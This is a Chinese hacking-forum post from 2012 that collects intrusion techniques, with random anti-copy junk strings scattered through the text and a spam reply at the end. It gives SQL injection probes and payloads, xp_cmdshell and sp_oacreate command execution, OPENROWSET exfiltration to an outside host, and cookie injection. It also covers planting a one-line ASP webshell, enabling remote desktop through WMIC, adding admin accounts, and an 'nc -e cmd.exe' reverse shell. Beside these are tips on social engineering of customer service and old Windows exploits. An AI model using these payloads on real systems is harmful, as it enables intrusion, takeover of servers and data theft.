找回密码
 立即注册
查看: 4395|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
" p) [2 E2 L, r7 {3 V+ k5 @( n* @, w

/ Z  f7 n7 D+ oSA点数据库分离搞法+语句:
. w. n: ?% V, _  |! ]" @  m8 M, t
0 `" J" u3 X9 i$ e5 R4 `7 Y* ]注射点不显错,执行下面三条语句页面都返回正常。* P0 ?* B7 o7 Z9 ^4 G& h
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
. B6 Y1 \9 M& S" R- Z# ^and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')( n; {& d1 I- C6 K/ L1 P& H
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')( C7 Q( \' z' J1 U4 W
可以列目录,判断系统为2000,web与数据库分离
( l3 V  ^- j; {; \8 r* U遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。+ I7 s9 y/ ^2 O
在注射点上执行
, ^4 u& h4 U  Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
, R" V) j5 I8 k# [$ N页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
1 ?# A) M2 \/ E% r还有我用NC监听得其他端口都没有得到IP。% w+ u) A/ s, U3 T$ @# U

8 N) l) Y" ?) B+ D" [8 h通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
7 u6 M/ ~& N* D$ S' d8 Y' M'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
1 m# t& y4 S. v7 g' i" n! x4 {3 A  a7 {/ i. c+ {
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--/ |3 i  D/ q+ c

# h% c8 f. J$ Y9 ]3 t现在就猜想是不是数据库是内网而且不能连外网。
: E9 k7 ?8 `$ i5 g7 T0 Y+ i9 ?, R0 m0 T2 R+ S

: E/ z2 N7 X- M% waccess导出txt文本代码  `/ |! v" T8 G6 z  M% j# [
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin! t, `  y: X3 T$ X

7 O! |4 A  I% I2 N* c. b" m5 y% ^- b6 }- d4 z! Q0 i

  B) S! x; w/ G4 ]3 {( u/ J5 G1 O自动跳转到指定网站代码头
0 r3 i5 `3 F, H( V: @$ T, {<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>0 d, c& Q8 T; p$ y$ Z- K

; Y4 f: ^, @: m7 x8 z. _
" u' [& g$ F. I/ g' c3 m0 b3 l入侵java or jsp站点时默认配置文件路径:& T- U4 X  o4 N% N  N
\web-inf\web.xml4 B$ D3 p4 |0 T9 i
tomcat下的配置文件位置:1 D2 X( c0 ?3 w/ Q" h/ k1 }7 o
\conf\server.xml            (前面加上tomcat路径)
! Y" M; w9 R( s' q0 w. B7 Z\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
$ E9 `. z" m4 s$ q/ e- k  C! y
' \/ a3 D7 k8 m/ q7 e4 O
( u0 Q, `; ?* e" k$ o. p9 Y1 ]* n) ]0 }: ^& W7 b7 Y6 {
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
) `# _( U( }# M3 }& o. f-1%23
. s( r$ B" }1 q0 t7 C- \9 J>
1 _% h. q% o& Z; a% P) u  ]0 P<
$ z  i, W) e& r) c: R- q5 \1'+or+'1'='16 r+ `$ v9 t% I: B# n8 H! T
id=8%bf- O3 V7 H! W5 h

: _5 R0 M6 |) j9 ^  v: t+ X6 k2 E全新注入点检测试法:0 f( t/ }! i) D9 Z0 |
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
+ ^" q% {  H: j; T8 {9 r( i7 d5 R$ l) Q; W/ j/ y) |9 X' q
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
7 B  e+ c# A3 u6 g! N0 s  A& E! T! K8 N. l! r3 o; p9 [
搜索型注入判断方法:
" [. e% a/ X$ i0 _, b7 v北京%' and '1'='1' and '%'='
( l, x& R5 o) p' _% \北京%' and '1'='2' and '%'='
5 e8 b# a' @+ ~* W# c3 E
% z% \6 s' k7 E2 n
  e0 F' g3 w5 `. P$ VCOOKIES注入:, t# l- [, [4 L( U- f- ]8 g! |+ S
2 F. T1 E' n' J0 L6 p9 P
javascript:alert(document.cookie="id="+escape("51 and 1=1"));2 F( }2 `3 s0 H7 X
- E0 G: b$ A8 K3 O1 d, H$ `* H
2000专业版查看本地登录用户命令:
3 g# l$ M1 k7 q6 i0 N: P4 Vnet config workstation
0 B: w. q0 J$ j& y! F
# }; E1 K& |2 Q7 k7 U( I  R# ]! Z3 G( q
2003下查看ipsec配置和默认防火墙配置命令:
- ^# j! [8 X! |; D7 V: T/ @netsh firewall show config
8 G$ L# a  @! {2 Jnetsh ipsec static show all
' _+ ?/ o% a! U; H
+ w+ Q1 y/ ?% X) u4 r不指派指定策略命令:+ F& p' _2 w3 U* a  {' `% G
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
6 f+ w  y# A7 Lnetsh ipsec static show policy all  显示策略名+ i2 g. V& s3 Y
2 B9 v1 u$ }7 E; u1 H4 P/ u
. E/ E& m  A! F' e+ U% E
猜管理员后台小技巧:, S5 F8 q; a7 I2 i
admin/left.asp , o! K& X" ^0 k* Q! Z; k$ L
admin/main.asp
6 H$ @0 q$ b$ m' _6 P' Wadmin/top.asp
- }( g( J" b* {* \( V& N( P( K7 i  ?admin/admin.asp
/ l7 R: V$ U& h4 l; b4 C! x会现出菜单导航,然后迅雷下载全部链接
" t+ i0 N* X/ j, N1 X& ?3 }4 B% j

1 J' p. P3 }% [  ~社会工程学:) f: p3 i8 E' _+ o9 D
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
% O. K( h& t8 h! ^然后去骗客服/ |. M0 v& N& r5 W& Y
( c% |6 [/ @( R+ b6 l
9 v" A5 V1 T: M. j/ V
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
* @9 s0 Z  S: P( J# x查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ' ^4 @7 e; e% }( v' X7 i: v6 A  T
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
2 X$ o1 ?! Y, Q! _2 R9 }% j- k& X0 X

+ y# |' W' J& O! C# l. g9 P1 \
1 Y/ ]# P4 a, V7 X$ V6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
% `0 E( ^6 h3 E& S& _- @2 L; o
9 r( p$ |) e' Z0 P
& j. f+ M; G& f  w) q* r' l  `( z! S' P; m" D1 z/ z
CMD加密注册表位置! Z1 r2 K* j* g$ I( n" N- V
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor& K6 ]( B( a) \0 [- l; a
AutoRun
! H; `7 \; Z3 Z. f* t! m- ^$ B2 \' C% I8 R
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor& |  t# y5 a8 f2 ^/ J" V
AutoRun# X, V2 O# ?$ P, \
: ?4 k& C$ t& S" R2 Y( A
- r, l6 b) O6 `. D
在找注入时搜索Hidden,把他改成test7 f2 @% v: `3 J% D

  o' E. r' j& F& ]+ y0 y5 q' N
8 u! E$ d: c! K! \! Z% ~& W, G. v: J5 H2 O' W9 r$ F* Q
mstsc /v:IP /console $ H) L1 u- I4 B0 d

( @2 }, d6 F' \+ b- @" N( N+ L0 `$ E
$ O6 R0 u. z. j, G  x/ u8 X一句话开3389:; I; e4 ~3 ^5 \  b; l7 E! h/ z3 `0 f
5 |: r1 Q5 N( ^9 p$ g/ K
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  - ]1 @* y8 h* O
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.% d/ h" R) M1 |8 Z9 K  H

+ c' [$ ~/ M) S9 r
1 W6 r! H% m1 O8 s7 Y# N6 ^知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:' r% }0 v5 w# \: u
Insert into admin(user,pwd) values('test','test')
, O% n( Y+ E" _; t" k7 z8 {' ?- K7 H# V

. _. x; H: Q: E3 K; d0 U: f7 u6 GNC反弹
+ w$ w+ s. X! a8 E! H- x. t; c/ X先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   / s4 w5 z$ r& O: g9 ^# W
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)! m) L2 O+ e' a. A2 m) y' p0 t

: p& }% W2 s* ]% o
+ V6 `  ]; x6 @5 ?  V) ?在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
0 K+ `0 `, X4 B' w, b9 a, R- z' K& Y9 Y: A
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录; o4 L; W' M. `4 C; ^2 F
例如:6 J/ J: h0 Z/ ~7 |
subst k: d:\www\ 用d盘www目录替代k盘) b2 B' @) ]% l. W* b0 t' l) e* o, P
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表